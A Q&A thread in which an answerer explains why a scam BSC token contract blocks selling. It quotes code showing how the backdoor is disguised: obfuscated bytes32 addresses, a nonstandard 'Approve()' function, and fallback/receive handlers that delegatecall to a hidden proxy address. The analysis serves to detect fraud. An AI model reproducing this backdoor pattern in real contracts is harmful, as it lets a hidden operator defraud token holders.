# Scam code but in smartcontract I dont see scam code

Tags: solidity, contract-development, scam

I see have this smartcontract:
https://bscscan.com/address/0xee6cacddd3a9370d87db581ee6728226883578e5#code

I see a lot of people say this project is a scam, I have tried and can only buy but cannot sell more than a certain amount of tokens.

I have looked at the source code and it is completely clean, so where is the scam code they hid it.

I know that with smart contract we can write another smart contract and upgrade the original one, but how to find that upgrade contract.

Answer (score 1):

It has several "clues" that aren't wrong by themselves but together they are the wrong indicators.

- Declaring constants as bytes32 but using them as addresses: `ACCESS_SETUP`, `ACCESS_REVOKE`.

  ```
  bytes32 private constant ACCESS_SETUP = 0x7c7658359fac0e747929ae9082329b3ce1794a825fcd4acfc143d8898b59ed76;
  bytes32 private constant ACCESS_REVOKE = 0xc55bf67f5c17582acfa13ccf23a15a374b0f5f20625b7d53666df1fe82b2916f;

  constructor() public payable {
      _setupRole(0, address(uint160(uint256(ACCESS_SETUP))));
      _revokeRole(0, address(uint160(uint256(ACCESS_REVOKE))));
  }
  ```

There's nothing wrong with the code but declaring them as address will save some gas. Unless you want to hide those addresses!!

- Suspicious name for a function. In the [EIP-20 specification](https://eips.ethereum.org/EIPS/eip-20) function names are lower case, only events use upper case. There is an `Approve()` function that mentions ERC-20 in the comments but such function isn't part of the standard.

  ```
  /**
   * @dev See {IERC20-approve}.
   *
   * Requirements:
   *
   * - `spender` cannot be the zero address.
   */
  function Approve(address spender, uint256 amount) public virtual safeCheck returns (bool) {
      __approve(_msgSender(), spender, amount);
      return true;
  }
  ```
- Using assembly unnecessarily. Some proxy contracts use this access pattern to store the target address.

  ```
  function referee() internal view returns (address user) {
      assembly { user := sload(CTRL) }
  }

  function accessRole() internal view virtual returns (address user) {
      assembly {
          user := sload(ACCESS)
      }
  }
  ```
- Now the smoking gun. For some reason the fallback and receive execute a `grant()` function.

  ```
  fallback() external payable { grant(); }
  receive() external payable { grant(); }
  ```

  It doesn't make much sense for a token to have a fallback function, unless it is hiding a proxy!

  It tries innocently to hide the call to `getRoleReferee(accessRole())`. Remember that `accessRole()` access some storage slot using assembly.

  ```
  function grant() internal {
      require(msg.sender != referee()); getRoleReferee(accessRole());
  }
  ```

  The `getRoleReferee` doesn't look like a getter at all.

  ```
  function getRoleReferee(address user) internal {
      assembly {
          calldatacopy(0, 0, calldatasize())
          let roleReferee := delegatecall(gas(), user, 0, calldatasize(), 0, 0)
          returndatacopy(0, 0, returndatasize())
          switch roleReferee
              case 0 { revert(0, returndatasize()) }
              default { return(0, returndatasize()) } 
      }
  }
  ```

Conclusion if you join all of this together the contracts allow a privileged account `referee()` to execute a contract `accessRole()` with full access to the contract's storage.

The contract can be changed by calling the not so innocent `Approve()` function.

Comment: have a lot of people have been scammed, is there any way to help them get it back?

Comment: @Ducnb I haven't checked but scammers are unlikely to leave a backdoor that anyone could use.